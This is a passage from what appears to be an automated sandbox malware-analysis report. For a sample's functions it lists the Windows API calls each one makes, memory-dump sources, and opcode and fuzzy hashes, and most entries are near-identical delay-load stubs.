                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: FileType
                  • String ID:
                  • API String ID: 3081899298-0
                  • Opcode ID: a2bcfa324071475e2cfb78eb394fb91ac54a5d813879d65a13d5a16ae4d9a2f9
                  • Instruction ID: 44e267250a227ebeb7554a9a348cb2e75d4684008f1fea5286b0ddacda4ffca8
                  • Opcode Fuzzy Hash: a2bcfa324071475e2cfb78eb394fb91ac54a5d813879d65a13d5a16ae4d9a2f9
                  • Instruction Fuzzy Hash: 3FD01236011144958F3586384D092B97755DB83376B39C6E8D125C40A1D763C983F641
                  Function 00A0D41A Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                  Download Yara Rule
                  APIs
                  • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 00A0D43F
                    • Part of subcall function 00A0AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00A0AC85
                    • Part of subcall function 00A0AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A0AC96
                    • Part of subcall function 00A0AC74: IsDialogMessageW.USER32(0001042A,?), ref: 00A0ACAA
                    • Part of subcall function 00A0AC74: TranslateMessage.USER32(?), ref: 00A0ACB8
                    • Part of subcall function 00A0AC74: DispatchMessageW.USER32(?), ref: 00A0ACC2
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: Message$DialogDispatchItemPeekSendTranslate
                  • String ID:
                  • API String ID: 897784432-0
                  • Opcode ID: 2c9d4dd13be0e210f000d90e81afb50908a65ba7f69e22047430b10f6e73116e
                  • Instruction ID: 4e62092ce563de88937b871f4ccc79b4b4161d812447581acc7a95fc71c437a3
                  • Opcode Fuzzy Hash: 2c9d4dd13be0e210f000d90e81afb50908a65ba7f69e22047430b10f6e73116e
                  • Instruction Fuzzy Hash: 43D09E31144304ABD6156B91DE06F1F7AA6BF98B05F004654B345740F18662AD219B16
                  Function 00A0D8AC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0D8A3
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 01fd8796ea09d7422de92b17f27aee3c407a6887426e0d00bb661b2f5792b9e1
                  • Instruction ID: 8a34d4a108f5c12beba6adacb4d4516b34ebe1759af7f899d1c9a1923c3bdc4e
                  • Opcode Fuzzy Hash: 01fd8796ea09d7422de92b17f27aee3c407a6887426e0d00bb661b2f5792b9e1
                  • Instruction Fuzzy Hash: EDB012B767C50ABE710861987E42E3B031CF4C1B11334C92AF609D00C0D4807C0C0A31
                  Function 00A0D8B6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0D8A3
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: c01e0df790aba92a6b907398bd681e03e76008373c529aec59f2a155777b5e6a
                  • Instruction ID: c5f53be434604e51fa6f9fa12183d983f453388974e63d23c3b38701c391a8c3
                  • Opcode Fuzzy Hash: c01e0df790aba92a6b907398bd681e03e76008373c529aec59f2a155777b5e6a
                  • Instruction Fuzzy Hash: A8B012B377D406BE710861887E02E37031CE4C2B11334C92AB909D01C0D4806C0D0D31
                  Function 00A0D891 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0D8A3
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 78f7063cbcdbef39524faf3f6d7b4337c4c3e4e4f9b1c87e7c333c779e0bb8a8
                  • Instruction ID: 1cf96ae6d63e039a602c296e4acac303df703cd93e84350e4ae0afd7fe50056a
                  • Opcode Fuzzy Hash: 78f7063cbcdbef39524faf3f6d7b4337c4c3e4e4f9b1c87e7c333c779e0bb8a8
                  • Instruction Fuzzy Hash: E4B012B767C706BE710821847E52D3B031CE4C1B11334CE3AF609E00C0D8807C4C4831
                  Function 00A0D8E8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0D8A3
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 3aa247258eb33caba8c1ea2dc8a63c1e3bb3f61c069b5314c1f58d7fa474769f
                  • Instruction ID: 5995f5bfa65bef1dd42e9930d3d6c8bf3073d43f425af9d5e41ce5b3338b88cb
                  • Opcode Fuzzy Hash: 3aa247258eb33caba8c1ea2dc8a63c1e3bb3f61c069b5314c1f58d7fa474769f
                  • Instruction Fuzzy Hash: 04B012B367C506BE714861887E02E37031CE4C1B11334CA2AB50DD00C0D8806C4C0931
                  Function 00A0D8F2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0D8A3
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: c6e39cc0b9a4a2b592cd01bf502dc85e6621214a7e98a0d91a8a58cf5677066e
                  • Instruction ID: e27fb5d83f78c66e5956950112ce6184c0235b25af04179ffa155835a1a9fa70
                  • Opcode Fuzzy Hash: c6e39cc0b9a4a2b592cd01bf502dc85e6621214a7e98a0d91a8a58cf5677066e
                  • Instruction Fuzzy Hash: 81B012B367C406BE710C61887F02E37031CE4C1B11334C92AB50DD00C0E4806D0D0931
                  Function 00A0D8FC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0D8A3
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 88f06b7cbdda91e0e21ae195a45e5dcf2eec7624a74f641b932fb0332f7a97b0
                  • Instruction ID: 05bcd3926adb44bd0b60a3db6edc8906ab985b9e3dafad2ab34669b6376537e2
                  • Opcode Fuzzy Hash: 88f06b7cbdda91e0e21ae195a45e5dcf2eec7624a74f641b932fb0332f7a97b0
                  • Instruction Fuzzy Hash: C6B012B367C406BE710C61997E02E37031CF4C1B11334C92AB50DD00C0D4806C0C0931
                  Function 00A0D8C0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0D8A3
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 7c488de84739eb914cf54d8263e3a16464f9ca8a2dd59481703335571404f60d
                  • Instruction ID: 2947e849ffe1ae291c2960c4f4249b92a03df7cffe37b170d38e34f95ba9bfda
                  • Opcode Fuzzy Hash: 7c488de84739eb914cf54d8263e3a16464f9ca8a2dd59481703335571404f60d
                  • Instruction Fuzzy Hash: 65B012B377C506BE714861887E02E37031CE4C1B11334CA2AB509D01C0D8806C8D0D31
                  Function 00A0D8CA Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0D8A3
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: aa995cc31f7f14f0a6096931069e01fd2b2f22594193974f17bb22e5ae26399e
                  • Instruction ID: e3d8f342fcdf58a8577ca94c5393f9b2eb8d655980c9afcca2f812617bbefb99
                  • Opcode Fuzzy Hash: aa995cc31f7f14f0a6096931069e01fd2b2f22594193974f17bb22e5ae26399e
                  • Instruction Fuzzy Hash: 25B012B377C406BE710C61887F02E37031CE4C1B11334C92AB509D01C0D4906C0E0D31
                  Function 00A0D8DE Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0D8A3
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 127eeb4e38de084751b63c062509dc61f7bd87166cf1d2d2a9dbc442054e808c
                  • Instruction ID: 246d26ec45cd14b04fb346f8c76a163c2ac4437fd91ee26d337a5a7c9a0b6ff1
                  • Opcode Fuzzy Hash: 127eeb4e38de084751b63c062509dc61f7bd87166cf1d2d2a9dbc442054e808c
                  • Instruction Fuzzy Hash: 98B012B367C506BE710861887E02E37031CE4C2B11334C92AB90DD00C0D4806C0C0931
                  Function 00A0D924 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0D8A3
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 8bc1c101a30baca3fb35ff8bc9316528ea5e0d84523a2f67445bd95ac8702f55
                  • Instruction ID: 8733be48de08a4a3498b5f1065d612959fbdaac22fbb40d49de2fc119864cbfd
                  • Opcode Fuzzy Hash: 8bc1c101a30baca3fb35ff8bc9316528ea5e0d84523a2f67445bd95ac8702f55
                  • Instruction Fuzzy Hash: 3DB012B367D406BE710861987E02E37035DF8C1B11334C92AB509D00C0D4806C0C0931
                  Function 00A0D92E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0D8A3
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 72b92aeb8177d80c43a361281b6d65c49c599496a68d9083daa60225af9d896f
                  • Instruction ID: 27a6d37ca93719c3502c4892425ae5fa06c5e42711d94f0d75e5757f41e1e111
                  • Opcode Fuzzy Hash: 72b92aeb8177d80c43a361281b6d65c49c599496a68d9083daa60225af9d896f
                  • Instruction Fuzzy Hash: 02B012B367C406BE710861997E02E37035CE4C2B11334C92ABA09D00C0D6806C0C0931
                  Function 00A0D906 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0D8A3
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: d29e5cae4dee4a31fe729a9792a582ab73998bb8a28bc20945c41a4771cdecd7
                  • Instruction ID: dadd1e8975e7a8d957dbe9bfc9f746b61b21bb41ecd0830f666eeaa608d3edf6
                  • Opcode Fuzzy Hash: d29e5cae4dee4a31fe729a9792a582ab73998bb8a28bc20945c41a4771cdecd7
                  • Instruction Fuzzy Hash: D5B012B367D406BE710861887E02E37031DE4C2B11334C92AB909D00C0D4806C0C0931
                  Function 00A0D910 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0D8A3
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: d3e0280b32c3038718c1fe815efcc3619bd1c20bdef150b175b403660dd14c2f
                  • Instruction ID: 2209b5d31c04412824903f1c5ed38ac7cc1a26cff2a9c52747b5e0c0ce25d7f5
                  • Opcode Fuzzy Hash: d3e0280b32c3038718c1fe815efcc3619bd1c20bdef150b175b403660dd14c2f
                  • Instruction Fuzzy Hash: A7B012B367D506BE714862887E02E37031DE4C1B11334CA2AB509D00C0D8806C4C0931
                  Function 00A0D942 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0D8A3
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
